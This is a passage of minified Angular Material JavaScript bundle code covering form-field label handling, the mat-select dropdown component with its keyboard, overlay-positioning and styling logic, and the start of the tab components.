this._canLabelFloat()&&(this._control&&this._control.shouldLabelFloat||this._shouldAlwaysFloat())}_hideControlPlaceholder(){return"legacy"===this.appearance&&!this._hasLabel()||this._hasLabel()&&!this._shouldLabelFloat()}_hasFloatingLabel(){return this._hasLabel()||"legacy"===this.appearance&&this._hasPlaceholder()}_getDisplayedMessages(){return this._errorChildren&&this._errorChildren.length>0&&this._control.errorState?"error":"hint"}_animateAndLockLabel(){this._hasFloatingLabel()&&this._canLabelFloat()&&(this._animationsEnabled&&this._label&&(this._showAlwaysAnimate=!0,Tc(this._label.nativeElement,"transitionend").pipe(Cn(1)).subscribe(()=>{this._showAlwaysAnimate=!1})),this.floatLabel="always",this._changeDetectorRef.markForCheck())}_validatePlaceholders(){}_processHints(){this._validateHints(),this._syncDescribedByIds()}_validateHints(){}_getDefaultFloatLabelState(){return this._defaults&&this._defaults.floatLabel||"auto"}_syncDescribedByIds(){if(this._control){let e=[];if(this._control.userAriaDescribedBy&&"string"==typeof this._control.userAriaDescribedBy&&e.push(...this._control.userAriaDescribedBy.split(" ")),"hint"===this._getDisplayedMessages()){const i=this._hintChildren?this._hintChildren.find(r=>"start"===r.align):null,n=this._hintChildren?this._hintChildren.find(r=>"end"===r.align):null;i?e.push(i.id):this._hintLabel&&e.push(this._hintLabelId),n&&e.push(n.id)}else this._errorChildren&&e.push(...this._errorChildren.map(i=>i.id));this._control.setDescribedByIds(e)}}_validateControlChild(){}updateOutlineGap(){const e=this._label?this._label.nativeElement:null,i=this._connectionContainerRef.nativeElement,n=".mat-form-field-outline-start",r=".mat-form-field-outline-gap";if("outline"!==this.appearance||!this._platform.isBrowser)return;if(!e||!e.children.length||!e.textContent.trim()){const q=i.querySelectorAll(`${n}, ${r}`);for(let Y=0;Y0?.75*Re+10:0}for(let q=0;q{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,$y,la]}),t})();const Rge=["trigger"],Sge=["panel"];function kge(t,a){if(1&t&&(m(0,"span",8),s(1),u()),2&t){const e=V();g(1),ke(e.placeholder)}}function Pge(t,a){if(1&t&&(m(0,"span",12),s(1),u()),2&t){const e=V(2);g(1),ke(e.triggerValue)}}function Oge(t,a){1&t&&va(0,0,["*ngSwitchCase","true"])}function Nge(t,a){1&t&&(m(0,"span",9),ne(1,Pge,2,1,"span",10),ne(2,Oge,1,0,"ng-content",11),u()),2&t&&(F("ngSwitch",!!V().customTrigger),g(2),F("ngSwitchCase",!0))}function Lge(t,a){if(1&t){const e=Ye();m(0,"div",13)(1,"div",14,15),he("@transformPanel.done",function(n){return be(e),Me(V()._panelDoneAnimatingStream.next(n.toState))})("keydown",function(n){return be(e),Me(V()._handleKeydown(n))}),va(3,1),u()()}if(2&t){const e=V();F("@transformPanelWrap",void 0),g(1),Dv("mat-select-panel ",e._getPanelTheme(),""),ri("transform-origin",e._transformOrigin)("font-size",e._triggerFontSize,"px"),F("ngClass",e.panelClass)("@transformPanel",e.multiple?"showing-multiple":"showing"),Rt("id",e.id+"-panel")("aria-multiselectable",e.multiple)("aria-label",e.ariaLabel||null)("aria-labelledby",e._getPanelAriaLabelledby())}}const zge=[[["mat-select-trigger"]],"*"],Wge=["mat-select-trigger","*"],pF={transformPanelWrap:nr("transformPanelWrap",[gn("* => void",c4("@transformPanel",[s4()],{optional:!0}))]),transformPanel:nr("transformPanel",[sn("void",zi({transform:"scaleY(0.8)",minWidth:"100%",opacity:0})),sn("showing",zi({opacity:1,minWidth:"calc(100% + 32px)",transform:"scaleY(1)"})),sn("showing-multiple",zi({opacity:1,minWidth:"calc(100% + 64px)",transform:"scaleY(1)"})),gn("void => *",En("120ms cubic-bezier(0, 0, 0.2, 1)")),gn("* => void",En("100ms 25ms linear",zi({opacity:0})))])};let _F=0;const CF=new ni("mat-select-scroll-strategy"),Hge=new ni("MAT_SELECT_CONFIG"),Uge={provide:CF,deps:[As],useFactory:function Bge(t){return()=>t.scrollStrategies.reposition()}};class qge{constructor(a,e){this.source=a,this.value=e}}const Gge=El(dp(Zc(Uw(class{constructor(t,a,e,i,n){this._elementRef=t,this._defaultErrorStateMatcher=a,this._parentForm=e,this._parentFormGroup=i,this.ngControl=n,this.stateChanges=new J}})))),yF=new ni("MatSelectTrigger");let jge=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-select-trigger"]],features:[ki([{provide:yF,useExisting:t}])]}),t})(),Qge=(()=>{class t extends Gge{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe,Re,Fe){var Ne,et,ut;super(c,r,T,k,Y),this._viewportRuler=e,this._changeDetectorRef=i,this._ngZone=n,this._dir=d,this._parentFormField=q,this._liveAnnouncer=Re,this._defaultOptions=Fe,this._panelOpen=!1,this._compareWith=(Ze,yt)=>Ze===yt,this._uid="mat-select-"+_F++,this._triggerAriaLabelledBy=null,this._destroy=new J,this._onChange=()=>{},this._onTouched=()=>{},this._valueId="mat-select-value-"+_F++,this._panelDoneAnimatingStream=new J,this._overlayPanelClass=(null===(Ne=this._defaultOptions)||void 0===Ne?void 0:Ne.overlayPanelClass)||"",this._focused=!1,this.controlType="mat-select",this._multiple=!1,this._disableOptionCentering=null!==(ut=null===(et=this._defaultOptions)||void 0===et?void 0:et.disableOptionCentering)&&void 0!==ut&&ut,this.ariaLabel="",this.optionSelectionChanges=rp(()=>{const Ze=this.options;return Ze?Ze.changes.pipe(Ro(Ze),Ur(()=>ra(...Ze.map(yt=>yt.onSelectionChange)))):this._ngZone.onStable.pipe(Cn(1),Ur(()=>this.optionSelectionChanges))}),this.openedChange=new Tt,this._openedStream=this.openedChange.pipe(Dn(Ze=>Ze),Xe(()=>{})),this._closedStream=this.openedChange.pipe(Dn(Ze=>!Ze),Xe(()=>{})),this.selectionChange=new Tt,this.valueChange=new Tt,this.ngControl&&(this.ngControl.valueAccessor=this),null!=(null==Fe?void 0:Fe.typeaheadDebounceInterval)&&(this._typeaheadDebounceInterval=Fe.typeaheadDebounceInterval),this._scrollStrategyFactory=pe,this._scrollStrategy=this._scrollStrategyFactory(),this.tabIndex=parseInt(te)||0,this.id=this.id}get focused(){return this._focused||this._panelOpen}get placeholder(){return this._placeholder}set placeholder(e){this._placeholder=e,this.stateChanges.next()}get required(){var e,i,n,r;return null!==(r=null!==(e=this._required)&&void 0!==e?e:null===(n=null===(i=this.ngControl)||void 0===i?void 0:i.control)||void 0===n?void 0:n.hasValidator(Td.required))&&void 0!==r&&r}set required(e){this._required=wi(e),this.stateChanges.next()}get multiple(){return this._multiple}set multiple(e){this._multiple=wi(e)}get disableOptionCentering(){return this._disableOptionCentering}set disableOptionCentering(e){this._disableOptionCentering=wi(e)}get compareWith(){return this._compareWith}set compareWith(e){this._compareWith=e,this._selectionModel&&this._initializeSelection()}get value(){return this._value}set value(e){this._assignValue(e)&&this._onChange(e)}get typeaheadDebounceInterval(){return this._typeaheadDebounceInterval}set typeaheadDebounceInterval(e){this._typeaheadDebounceInterval=Uo(e)}get id(){return this._id}set id(e){this._id=e||this._uid,this.stateChanges.next()}ngOnInit(){this._selectionModel=new I1(this.multiple),this.stateChanges.next(),this._panelDoneAnimatingStream.pipe(Bh(),ea(this._destroy)).subscribe(()=>this._panelDoneAnimating(this.panelOpen))}ngAfterContentInit(){this._initKeyManager(),this._selectionModel.changed.pipe(ea(this._destroy)).subscribe(e=>{e.added.forEach(i=>i.select()),e.removed.forEach(i=>i.deselect())}),this.options.changes.pipe(Ro(null),ea(this._destroy)).subscribe(()=>{this._resetOptions(),this._initializeSelection()})}ngDoCheck(){const e=this._getTriggerAriaLabelledby(),i=this.ngControl;if(e!==this._triggerAriaLabelledBy){const n=this._elementRef.nativeElement;this._triggerAriaLabelledBy=e,e?n.setAttribute("aria-labelledby",e):n.removeAttribute("aria-labelledby")}i&&(this._previousControl!==i.control&&(void 0!==this._previousControl&&null!==i.disabled&&i.disabled!==this.disabled&&(this.disabled=i.disabled),this._previousControl=i.control),this.updateErrorState())}ngOnChanges(e){(e.disabled||e.userAriaDescribedBy)&&this.stateChanges.next(),e.typeaheadDebounceInterval&&this._keyManager&&this._keyManager.withTypeAhead(this._typeaheadDebounceInterval)}ngOnDestroy(){this._destroy.next(),this._destroy.complete(),this.stateChanges.complete()}toggle(){this.panelOpen?this.close():this.open()}open(){this._canOpen()&&(this._panelOpen=!0,this._keyManager.withHorizontalOrientation(null),this._highlightCorrectOption(),this._changeDetectorRef.markForCheck())}close(){this._panelOpen&&(this._panelOpen=!1,this._keyManager.withHorizontalOrientation(this._isRtl()?"rtl":"ltr"),this._changeDetectorRef.markForCheck(),this._onTouched())}writeValue(e){this._assignValue(e)}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e,this._changeDetectorRef.markForCheck(),this.stateChanges.next()}get panelOpen(){return this._panelOpen}get selected(){var e,i;return this.multiple?(null===(e=this._selectionModel)||void 0===e?void 0:e.selected)||[]:null===(i=this._selectionModel)||void 0===i?void 0:i.selected[0]}get triggerValue(){if(this.empty)return"";if(this._multiple){const e=this._selectionModel.selected.map(i=>i.viewValue);return this._isRtl()&&e.reverse(),e.join(", ")}return this._selectionModel.selected[0].viewValue}_isRtl(){return!!this._dir&&"rtl"===this._dir.value}_handleKeydown(e){this.disabled||(this.panelOpen?this._handleOpenKeydown(e):this._handleClosedKeydown(e))}_handleClosedKeydown(e){const i=e.keyCode,n=40===i||38===i||37===i||39===i,r=13===i||32===i,c=this._keyManager;if(!c.isTyping()&&r&&!es(e)||(this.multiple||e.altKey)&&n)e.preventDefault(),this.open();else if(!this.multiple){const d=this.selected;c.onKeydown(e);const T=this.selected;T&&d!==T&&this._liveAnnouncer.announce(T.viewValue,1e4)}}_handleOpenKeydown(e){const i=this._keyManager,n=e.keyCode,r=40===n||38===n,c=i.isTyping();if(r&&e.altKey)e.preventDefault(),this.close();else if(c||13!==n&&32!==n||!i.activeItem||es(e))if(!c&&this._multiple&&65===n&&e.ctrlKey){e.preventDefault();const d=this.options.some(T=>!T.disabled&&!T.selected);this.options.forEach(T=>{T.disabled||(d?T.select():T.deselect())})}else{const d=i.activeItemIndex;i.onKeydown(e),this._multiple&&r&&e.shiftKey&&i.activeItem&&i.activeItemIndex!==d&&i.activeItem._selectViaInteraction()}else e.preventDefault(),i.activeItem._selectViaInteraction()}_onFocus(){this.disabled||(this._focused=!0,this.stateChanges.next())}_onBlur(){this._focused=!1,!this.disabled&&!this.panelOpen&&(this._onTouched(),this._changeDetectorRef.markForCheck(),this.stateChanges.next())}_onAttached(){this._overlayDir.positionChange.pipe(Cn(1)).subscribe(()=>{this._changeDetectorRef.detectChanges(),this._positioningSettled()})}_getPanelTheme(){return this._parentFormField?`mat-${this._parentFormField.color}`:""}get empty(){return!this._selectionModel||this._selectionModel.isEmpty()}_initializeSelection(){Promise.resolve().then(()=>{this.ngControl&&(this._value=this.ngControl.value),this._setSelectionByValue(this._value),this.stateChanges.next()})}_setSelectionByValue(e){if(this._selectionModel.selected.forEach(i=>i.setInactiveStyles()),this._selectionModel.clear(),this.multiple&&e)Array.isArray(e),e.forEach(i=>this._selectOptionByValue(i)),this._sortValues();else{const i=this._selectOptionByValue(e);i?this._keyManager.updateActiveItem(i):this.panelOpen||this._keyManager.updateActiveItem(-1)}this._changeDetectorRef.markForCheck()}_selectOptionByValue(e){const i=this.options.find(n=>{if(this._selectionModel.isSelected(n))return!1;try{return null!=n.value&&this._compareWith(n.value,e)}catch(r){return!1}});return i&&this._selectionModel.select(i),i}_assignValue(e){return!!(e!==this._value||this._multiple&&Array.isArray(e))&&(this.options&&this._setSelectionByValue(e),this._value=e,!0)}_initKeyManager(){this._keyManager=new Bz(this.options).withTypeAhead(this._typeaheadDebounceInterval).withVerticalOrientation().withHorizontalOrientation(this._isRtl()?"rtl":"ltr").withHomeAndEnd().withAllowedModifierKeys(["shiftKey"]),this._keyManager.tabOut.pipe(ea(this._destroy)).subscribe(()=>{this.panelOpen&&(!this.multiple&&this._keyManager.activeItem&&this._keyManager.activeItem._selectViaInteraction(),this.focus(),this.close())}),this._keyManager.change.pipe(ea(this._destroy)).subscribe(()=>{this._panelOpen&&this.panel?this._scrollOptionIntoView(this._keyManager.activeItemIndex||0):!this._panelOpen&&!this.multiple&&this._keyManager.activeItem&&this._keyManager.activeItem._selectViaInteraction()})}_resetOptions(){const e=ra(this.options.changes,this._destroy);this.optionSelectionChanges.pipe(ea(e)).subscribe(i=>{this._onSelect(i.source,i.isUserInput),i.isUserInput&&!this.multiple&&this._panelOpen&&(this.close(),this.focus())}),ra(...this.options.map(i=>i._stateChanges)).pipe(ea(e)).subscribe(()=>{this._changeDetectorRef.markForCheck(),this.stateChanges.next()})}_onSelect(e,i){const n=this._selectionModel.isSelected(e);null!=e.value||this._multiple?(n!==e.selected&&(e.selected?this._selectionModel.select(e):this._selectionModel.deselect(e)),i&&this._keyManager.setActiveItem(e),this.multiple&&(this._sortValues(),i&&this.focus())):(e.deselect(),this._selectionModel.clear(),null!=this.value&&this._propagateChanges(e.value)),n!==this._selectionModel.isSelected(e)&&this._propagateChanges(),this.stateChanges.next()}_sortValues(){if(this.multiple){const e=this.options.toArray();this._selectionModel.sort((i,n)=>this.sortComparator?this.sortComparator(i,n,e):e.indexOf(i)-e.indexOf(n)),this.stateChanges.next()}}_propagateChanges(e){let i=null;i=this.multiple?this.selected.map(n=>n.value):this.selected?this.selected.value:e,this._value=i,this.valueChange.emit(i),this._onChange(i),this.selectionChange.emit(this._getChangeEvent(i)),this._changeDetectorRef.markForCheck()}_highlightCorrectOption(){this._keyManager&&(this.empty?this._keyManager.setFirstItemActive():this._keyManager.setActiveItem(this._selectionModel.selected[0]))}_canOpen(){var e;return!this._panelOpen&&!this.disabled&&(null===(e=this.options)||void 0===e?void 0:e.length)>0}focus(e){this._elementRef.nativeElement.focus(e)}_getPanelAriaLabelledby(){var e;if(this.ariaLabel)return null;const i=null===(e=this._parentFormField)||void 0===e?void 0:e.getLabelId();return this.ariaLabelledby?(i?i+" ":"")+this.ariaLabelledby:i}_getAriaActiveDescendant(){return this.panelOpen&&this._keyManager&&this._keyManager.activeItem?this._keyManager.activeItem.id:null}_getTriggerAriaLabelledby(){var e;if(this.ariaLabel)return null;const i=null===(e=this._parentFormField)||void 0===e?void 0:e.getLabelId();let n=(i?i+" ":"")+this._valueId;return this.ariaLabelledby&&(n+=" "+this.ariaLabelledby),n}_panelDoneAnimating(e){this.openedChange.emit(e)}setDescribedByIds(e){e.length?this._elementRef.nativeElement.setAttribute("aria-describedby",e.join(" ")):this._elementRef.nativeElement.removeAttribute("aria-describedby")}onContainerClick(){this.focus(),this.open()}get shouldLabelFloat(){return this._panelOpen||!this.empty||this._focused&&!!this._placeholder}}return t.\u0275fac=function(e){return new(e||t)(Ee(bm),Ee(Ma),Ee(qi),Ee(mp),Ee(mi),Ee(Cr,8),Ee(y1,8),Ee(lg,8),Ee(cb,8),Ee(fm,10),Vr("tabindex"),Ee(CF),Ee(Nw),Ee(Hge,8))},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&(Mi(Rge,5),Mi(Sge,5),Mi(i8,5)),2&e){let n;Vt(n=Bt())&&(i.trigger=n.first),Vt(n=Bt())&&(i.panel=n.first),Vt(n=Bt())&&(i._overlayDir=n.first)}},inputs:{userAriaDescribedBy:["aria-describedby","userAriaDescribedBy"],panelClass:"panelClass",placeholder:"placeholder",required:"required",multiple:"multiple",disableOptionCentering:"disableOptionCentering",compareWith:"compareWith",value:"value",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],errorStateMatcher:"errorStateMatcher",typeaheadDebounceInterval:"typeaheadDebounceInterval",sortComparator:"sortComparator",id:"id"},outputs:{openedChange:"openedChange",_openedStream:"opened",_closedStream:"closed",selectionChange:"selectionChange",valueChange:"valueChange"},features:[ci,sa]}),t})(),Nr=(()=>{class t extends Qge{constructor(){super(...arguments),this._scrollTop=0,this._triggerFontSize=0,this._transformOrigin="top",this._offsetY=0,this._positions=[{originX:"start",originY:"top",overlayX:"start",overlayY:"top"},{originX:"start",originY:"bottom",overlayX:"start",overlayY:"bottom"}]}_calculateOverlayScroll(e,i,n){const r=this._getItemHeight();return Math.min(Math.max(0,r*e-i+r/2),n)}ngOnInit(){super.ngOnInit(),this._viewportRuler.change().pipe(ea(this._destroy)).subscribe(()=>{this.panelOpen&&(this._triggerRect=this.trigger.nativeElement.getBoundingClientRect(),this._changeDetectorRef.markForCheck())})}open(){super._canOpen()&&(super.open(),this._triggerRect=this.trigger.nativeElement.getBoundingClientRect(),this._triggerFontSize=parseInt(getComputedStyle(this.trigger.nativeElement).fontSize||"0"),this._calculateOverlayPosition(),this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{this._triggerFontSize&&this._overlayDir.overlayRef&&this._overlayDir.overlayRef.overlayElement&&(this._overlayDir.overlayRef.overlayElement.style.fontSize=`${this._triggerFontSize}px`)}))}_scrollOptionIntoView(e){const i=$w(e,this.options,this.optionGroups),n=this._getItemHeight();this.panel.nativeElement.scrollTop=0===e&&1===i?0:RW((e+i)*n,n,this.panel.nativeElement.scrollTop,256)}_positioningSettled(){this._calculateOverlayOffsetX(),this.panel.nativeElement.scrollTop=this._scrollTop}_panelDoneAnimating(e){this.panelOpen?this._scrollTop=0:(this._overlayDir.offsetX=0,this._changeDetectorRef.markForCheck()),super._panelDoneAnimating(e)}_getChangeEvent(e){return new qge(this,e)}_calculateOverlayOffsetX(){const e=this._overlayDir.overlayRef.overlayElement.getBoundingClientRect(),i=this._viewportRuler.getViewportSize(),n=this._isRtl(),r=this.multiple?56:32;let c;if(this.multiple)c=40;else if(this.disableOptionCentering)c=16;else{let k=this._selectionModel.selected[0]||this.options.first;c=k&&k.group?32:16}n||(c*=-1);const d=0-(e.left+c-(n?r:0)),T=e.right+c-i.width+(n?0:r);d>0?c+=d+8:T>0&&(c-=T+8),this._overlayDir.offsetX=Math.round(c),this._overlayDir.overlayRef.updatePosition()}_calculateOverlayOffsetY(e,i,n){const r=this._getItemHeight(),c=(r-this._triggerRect.height)/2,d=Math.floor(256/r);let T;return this.disableOptionCentering?0:(T=0===this._scrollTop?e*r:this._scrollTop===n?(e-(this._getItemCount()-d))*r+(r-(this._getItemCount()*r-256)%r):i-r/2,Math.round(-1*T-c))}_checkOverlayWithinViewport(e){const i=this._getItemHeight(),n=this._viewportRuler.getViewportSize(),r=this._triggerRect.top-8,c=n.height-this._triggerRect.bottom-8,d=Math.abs(this._offsetY),k=Math.min(this._getItemCount()*i,256)-d-this._triggerRect.height;k>c?this._adjustPanelUp(k,c):d>r?this._adjustPanelDown(d,r,e):this._transformOrigin=this._getOriginBasedOnOption()}_adjustPanelUp(e,i){const n=Math.round(e-i);this._scrollTop-=n,this._offsetY-=n,this._transformOrigin=this._getOriginBasedOnOption(),this._scrollTop<=0&&(this._scrollTop=0,this._offsetY=0,this._transformOrigin="50% bottom 0px")}_adjustPanelDown(e,i,n){const r=Math.round(e-i);if(this._scrollTop+=r,this._offsetY+=r,this._transformOrigin=this._getOriginBasedOnOption(),this._scrollTop>=n)return this._scrollTop=n,this._offsetY=0,void(this._transformOrigin="50% top 0px")}_calculateOverlayPosition(){const e=this._getItemHeight(),i=this._getItemCount(),n=Math.min(i*e,256),c=i*e-n;let d;d=this.empty?0:Math.max(this.options.toArray().indexOf(this._selectionModel.selected[0]),0),d+=$w(d,this.options,this.optionGroups);const T=n/2;this._scrollTop=this._calculateOverlayScroll(d,T,c),this._offsetY=this._calculateOverlayOffsetY(d,T,c),this._checkOverlayWithinViewport(c)}_getOriginBasedOnOption(){const e=this._getItemHeight(),i=(e-this._triggerRect.height)/2;return`50% ${Math.abs(this._offsetY)-i+e/2}px 0px`}_getItemHeight(){return 3*this._triggerFontSize}_getItemCount(){return this.options.length+this.optionGroups.length}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-select"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,yF,5),fa(n,yr,5),fa(n,j3,5)),2&e){let r;Vt(r=Bt())&&(i.customTrigger=r.first),Vt(r=Bt())&&(i.options=r),Vt(r=Bt())&&(i.optionGroups=r)}},hostAttrs:["role","combobox","aria-autocomplete","none","aria-haspopup","true",1,"mat-select"],hostVars:19,hostBindings:function(e,i){1&e&&he("keydown",function(r){return i._handleKeydown(r)})("focus",function(){return i._onFocus()})("blur",function(){return i._onBlur()}),2&e&&(Rt("id",i.id)("tabindex",i.tabIndex)("aria-controls",i.panelOpen?i.id+"-panel":null)("aria-expanded",i.panelOpen)("aria-label",i.ariaLabel||null)("aria-required",i.required.toString())("aria-disabled",i.disabled.toString())("aria-invalid",i.errorState)("aria-activedescendant",i._getAriaActiveDescendant()),Ct("mat-select-disabled",i.disabled)("mat-select-invalid",i.errorState)("mat-select-required",i.required)("mat-select-empty",i.empty)("mat-select-multiple",i.multiple))},inputs:{disabled:"disabled",disableRipple:"disableRipple",tabIndex:"tabIndex"},exportAs:["matSelect"],features:[ki([{provide:sb,useExisting:t},{provide:G3,useExisting:t}]),ci],ngContentSelectors:Wge,decls:9,vars:12,consts:[["cdk-overlay-origin","",1,"mat-select-trigger",3,"click"],["origin","cdkOverlayOrigin","trigger",""],[1,"mat-select-value",3,"ngSwitch"],["class","mat-select-placeholder mat-select-min-line",4,"ngSwitchCase"],["class","mat-select-value-text",3,"ngSwitch",4,"ngSwitchCase"],[1,"mat-select-arrow-wrapper"],[1,"mat-select-arrow"],["cdk-connected-overlay","","cdkConnectedOverlayLockPosition","","cdkConnectedOverlayHasBackdrop","","cdkConnectedOverlayBackdropClass","cdk-overlay-transparent-backdrop",3,"cdkConnectedOverlayPanelClass","cdkConnectedOverlayScrollStrategy","cdkConnectedOverlayOrigin","cdkConnectedOverlayOpen","cdkConnectedOverlayPositions","cdkConnectedOverlayMinWidth","cdkConnectedOverlayOffsetY","backdropClick","attach","detach"],[1,"mat-select-placeholder","mat-select-min-line"],[1,"mat-select-value-text",3,"ngSwitch"],["class","mat-select-min-line",4,"ngSwitchDefault"],[4,"ngSwitchCase"],[1,"mat-select-min-line"],[1,"mat-select-panel-wrap"],["role","listbox","tabindex","-1",3,"ngClass","keydown"],["panel",""]],template:function(e,i){if(1&e&&(Jn(zge),m(0,"div",0,1),he("click",function(){return i.toggle()}),m(3,"div",2),ne(4,kge,2,1,"span",3),ne(5,Nge,3,2,"span",4),u(),m(6,"div",5),it(7,"div",6),u()(),ne(8,Lge,4,14,"ng-template",7),he("backdropClick",function(){return i.close()})("attach",function(){return i._onAttached()})("detach",function(){return i.close()})),2&e){const n=Ti(1);Rt("aria-owns",i.panelOpen?i.id+"-panel":null),g(3),F("ngSwitch",i.empty),Rt("id",i._valueId),g(1),F("ngSwitchCase",!0),g(1),F("ngSwitchCase",!1),g(3),F("cdkConnectedOverlayPanelClass",i._overlayPanelClass)("cdkConnectedOverlayScrollStrategy",i._scrollStrategy)("cdkConnectedOverlayOrigin",n)("cdkConnectedOverlayOpen",i.panelOpen)("cdkConnectedOverlayPositions",i._positions)("cdkConnectedOverlayMinWidth",null==i._triggerRect?null:i._triggerRect.width)("cdkConnectedOverlayOffsetY",i._offsetY)}},dependencies:[ig,Jf,p1,d6,i8,t8],styles:['.mat-select{display:inline-block;width:100%;outline:none}.mat-select-trigger{display:inline-flex;align-items:center;cursor:pointer;position:relative;box-sizing:border-box;width:100%}.mat-select-disabled .mat-select-trigger{-webkit-user-select:none;user-select:none;cursor:default}.mat-select-value{width:100%;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.mat-select-value-text{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.mat-select-arrow-wrapper{height:16px;flex-shrink:0;display:inline-flex;align-items:center}.mat-form-field-appearance-fill .mat-select-arrow-wrapper{transform:translateY(-50%)}.mat-form-field-appearance-outline .mat-select-arrow-wrapper{transform:translateY(-25%)}.mat-form-field-appearance-standard.mat-form-field-has-label .mat-select:not(.mat-select-empty) .mat-select-arrow-wrapper{transform:translateY(-50%)}.mat-form-field-appearance-standard .mat-select.mat-select-empty .mat-select-arrow-wrapper{transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}._mat-animation-noopable.mat-form-field-appearance-standard .mat-select.mat-select-empty .mat-select-arrow-wrapper{transition:none}.mat-select-arrow{width:0;height:0;border-left:5px solid rgba(0,0,0,0);border-right:5px solid rgba(0,0,0,0);border-top:5px solid;margin:0 4px}.mat-form-field.mat-focused .mat-select-arrow{transform:translateX(0)}.mat-select-panel-wrap{flex-basis:100%}.mat-select-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;padding-top:0;padding-bottom:0;max-height:256px;min-width:100%;border-radius:4px;outline:0}.cdk-high-contrast-active .mat-select-panel{outline:solid 1px}.mat-select-panel .mat-optgroup-label,.mat-select-panel .mat-option{font-size:inherit;line-height:3em;height:3em}.mat-form-field-type-mat-select:not(.mat-form-field-disabled) .mat-form-field-flex{cursor:pointer}.mat-form-field-type-mat-select .mat-form-field-label{width:calc(100% - 18px)}.mat-select-placeholder{transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}._mat-animation-noopable .mat-select-placeholder{transition:none}.mat-form-field-hide-placeholder .mat-select-placeholder{color:rgba(0,0,0,0);-webkit-text-fill-color:rgba(0,0,0,0);transition:none;display:block}.mat-select-min-line:empty::before{content:" ";white-space:pre;width:1px;display:inline-block;visibility:hidden}'],encapsulation:2,data:{animation:[pF.transformPanelWrap,pF.transformPanel]},changeDetection:0}),t})(),s8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Uge],imports:[rn,bu,Q3,la,uu,r8,Q3,la]}),t})();function $ge(t,a){1&t&&va(0)}const bF=["*"];function Kge(t,a){}const Xge=function(t){return{animationDuration:t}},Yge=function(t,a){return{value:t,params:a}},Jge=["tabListContainer"],Zge=["tabList"],e0e=["tabListInner"],t0e=["nextPaginator"],i0e=["previousPaginator"],a0e=["tabBodyWrapper"],n0e=["tabHeader"];function o0e(t,a){}function r0e(t,a){1&t&&ne(0,o0e,0,0,"ng-template",10),2&t&&F("cdkPortalOutlet",V().$implicit.templateLabel)}function s0e(t,a){1&t&&s(0),2&t&&ke(V().$implicit.textLabel)}function c0e(t,a){if(1&t){const e=Ye();m(0,"div",6),he("click",function(){const n=be(e),r=n.$implicit,c=n.index,d=V(),T=Ti(1);return Me(d._handleClick(r,T,c))})("cdkFocusChange",function(n){const c=be(e).index;return Me(V()._tabFocusChanged(n,c))}),m(1,"div",7),ne(2,r0e,1,1,"ng-template",8),ne(3,s0e,1,1,"ng-template",null,9,d1),u()()}if(2&t){const e=a.$implicit,i=a.index,n=Ti(4),r=V();Ct("mat-tab-label-active",r.selectedIndex===i),F("id",r._getTabLabelId(i))("ngClass",e.labelClass)("disabled",e.disabled)("matRippleDisabled",e.disabled||r.disableRipple),Rt("tabIndex",r._getTabIndex(e,i))("aria-posinset",i+1)("aria-setsize",r._tabs.length)("aria-controls",r._getTabContentId(i))("aria-selected",r.selectedIndex===i)("aria-label",e.ariaLabel||null)("aria-labelledby",!e.ariaLabel&&e.ariaLabelledby?e.ariaLabelledby:null),g(2),F("ngIf",e.templateLabel)("ngIfElse",n)}}function l0e(t,a){if(1&t){const e=Ye();m(0,"mat-tab-body",11),he("_onCentered",function(){return be(e),Me(V()._removeTabBodyWrapperHeight())})("_onCentering",function(n){return be(e),Me(V()._setTabBodyWrapperHeight(n))}),u()}if(2&t){const e=a.$implicit,i=a.index,n=V();Ct("mat-tab-body-active",n.selectedIndex===i),F("id",n._getTabContentId(i))("ngClass",e.bodyClass)("content",e.content)("position",e.position)("origin",e.origin)("animationDuration",n.animationDuration)("preserveContent",n.preserveContent),Rt("tabindex",null!=n.contentTabIndex&&n.selectedIndex===i?n.contentTabIndex:null)("aria-labelledby",n._getTabLabelId(i))}}const d0e=new ni("MatInkBarPositioner",{providedIn:"root",factory:function m0e(){return a=>({left:a?(a.offsetLeft||0)+"px":"0",width:a?(a.offsetWidth||0)+"px":"0"})}});let MF=(()=>{class t{constructor(e,i,n,r){this._elementRef=e,this._ngZone=i,this._inkBarPositioner=n,this._animationMode=r}alignToElement(e){this.show(),this._ngZone.run(()=>{this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{const i=this._inkBarPositioner(e),n=this._elementRef.nativeElement;n.style.left=i.left,n.style.width=i.width})})}show(){this._elementRef.nativeElement.style.visibility="visible"}hide(){this._elementRef.nativeElement.style.visibility="hidden"}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(d0e),Ee(ar,8))},t.\u0275dir=Ot({type:t,selectors:[["mat-ink-bar"]],hostAttrs:[1,"mat-ink-bar"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode)}}),t})();const vF=new ni("MatTabContent");let Uh=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","matTabContent",""]],features:[ki([{provide:vF,useExisting:t}])]}),t})();const AF=new ni("MatTabLabel"),TF=new ni("MAT_TAB");let V1=(()=>{class t extends O_e{constructor(e,i,n){super(e,i),this._closestTab=n}}return t.\u0275fac=function(e){return 